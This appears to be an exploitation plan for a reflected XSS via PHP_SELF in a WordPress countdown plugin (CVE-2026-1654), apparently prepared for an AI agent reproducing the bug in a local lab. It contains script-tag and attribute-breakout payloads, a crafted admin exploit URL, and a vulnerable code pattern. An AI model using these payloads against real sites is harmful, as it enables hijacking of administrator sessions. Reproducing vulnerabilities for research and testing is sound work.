Peter's Date Countdown <= 2.0.0 - Reflected Cross-Site Scripting via $_SERVER['PHP_SELF']

This plan outlines the research and exploitation strategy for CVE-2026-1654, a reflected Cross-Site Scripting (XSS) vulnerability in the "Peter's Date Countdown" plugin for WordPress.

1. Vulnerability Summary

The Peter's Date Countdown plugin (versions <= 2.0.0) fails to sanitize or escape the $_SERVER['PHP_SELF'] superglobal before echoing it into the HTML response. PHP_SELF contains the path to the currently executing script relative to the document root. By appending arbitrary characters and script tags to the URL path (path-info), an attacker can inject malicious HTML/JavaScript that the browser will execute when the page is rendered.

2. Attack Vector Analysis

• Endpoint: Any page where the plugin renders a form or link using PHP_SELF. This is most commonly found in the plugin's admin settings page.
• Vulnerable Parameter: The URL path itself (interpreted as PHP_SELF).
• Authentication: Unauthenticated (Attacker), but requires a logged-in user with access to the vulnerable page (Victim, typically an Administrator) to click a crafted link.
• Preconditions: The plugin must be active. The victim must be tricked into visiting a URL containing the payload.

3. Code Flow (Inferred)

1. Entry Point: A user (victim) navigates to an admin page registered by the plugin, e.g., wp-admin/options-general.php?page=peters-date-countdown.
2. Processing: The plugin's admin menu callback function is triggered.
3. Vulnerable Sink: Inside the callback, the code likely contains a form or a self-referencing link:

   // Example of vulnerable pattern
   echo '<form method="post" action="' . $_SERVER['PHP_SELF'] . '?page=peters-date-countdown">';
   

4. Reflection: Because $_SERVER['PHP_SELF'] includes the path provided in the URL (including everything after .php), the attacker-supplied script is echoed directly into the action attribute without being wrapped in esc_url() or esc_attr().

4. Nonce Acquisition Strategy

Reflected XSS via PHP_SELF typically occurs during a GET request to display a page.

• Is a nonce required? No. The vulnerability exists in the rendering of the page, not in the processing of a state-changing request (like an AJAX action).
• Bypass: Since the goal is to execute JavaScript in the victim's browser, the lack of a nonce does not prevent the XSS from triggering.

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can execute JavaScript in the context of an administrator.

1. Identify the Admin Page: Confirm the slug for the settings page. Based on standard WordPress conventions for this plugin, it is likely peters-date-countdown.
2. Craft the Payload:
   • We need to "break out" of the HTML attribute where PHP_SELF is reflected.
   • If reflected in a form action: action="/wp-admin/options-general.php/[PAYLOAD]?page=..."
   • Payload: "><script>alert(document.domain)</script>
   • URL Encoded: %22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
3. Construct the Exploit URL:
   http://TARGET/wp-admin/options-general.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?page=peters-date-countdown
4. Execution:
   • Use browser_navigate to simulate an administrator visiting the malicious URL.
   • The agent must be logged in as an admin in the browser session.

6. Test Data Setup

1. Install Plugin: Use WP-CLI to install the vulnerable version.

   wp plugin install peters-date-countdown --version=2.0.0 --activate
   

2. Create Admin: Ensure an administrator user exists (default admin / password).
3. Identify Vulnerable File: Run a search to confirm the sink location.

   grep -rn "PHP_SELF" /var/www/html/wp-content/plugins/peters-date-countdown/
   

7. Expected Results

• The browser should navigate to the URL.
• The HTML source of the rendered page should contain: <form ... action="/wp-admin/options-general.php/"><script>alert(document.domain)</script>?page=peters-date-countdown" ...>
• The browser_eval or a screenshot should confirm the execution of the alert() or the presence of the injected script tag in the DOM.

8. Verification Steps

1. Check for Reflection:
   Use http_request as an admin and check the body for the payload.

   // Example Verification Request
   const response = await http_request.get("http://localhost:8888/wp-admin/options-general.php/%22%3E%3Ccanary%3E?page=peters-date-countdown");
   if (response.body.includes('"><canary>')) {
       console.log("Vulnerability Confirmed: Unescaped PHP_SELF reflection found.");
   }
   

2. Verify via CLI:
   Confirm the plugin version is exactly 2.0.0.

   wp plugin get peters-date-countdown --field=version
   

9. Alternative Approaches

If the reflection is not in the action attribute of a form, check for:

• Hidden Inputs: <input type="hidden" name="redirect" value="<?php echo $_SERVER['PHP_SELF']; ?>">
  • Payload: "/><script>alert(1)</script>
• Anchor Tags: <a href="<?php echo $_SERVER['PHP_SELF']; ?>">
  • Payload: "><script>alert(1)</script>
• JS Variables: var current_url = '<?php echo $_SERVER['PHP_SELF']; ?>';
  • Payload: ';alert(1);//

If options-general.php is not the parent page, search for add_menu_page or add_options_page in the source to find the correct parent file. (Common parents: admin.php, index.php, plugins.php).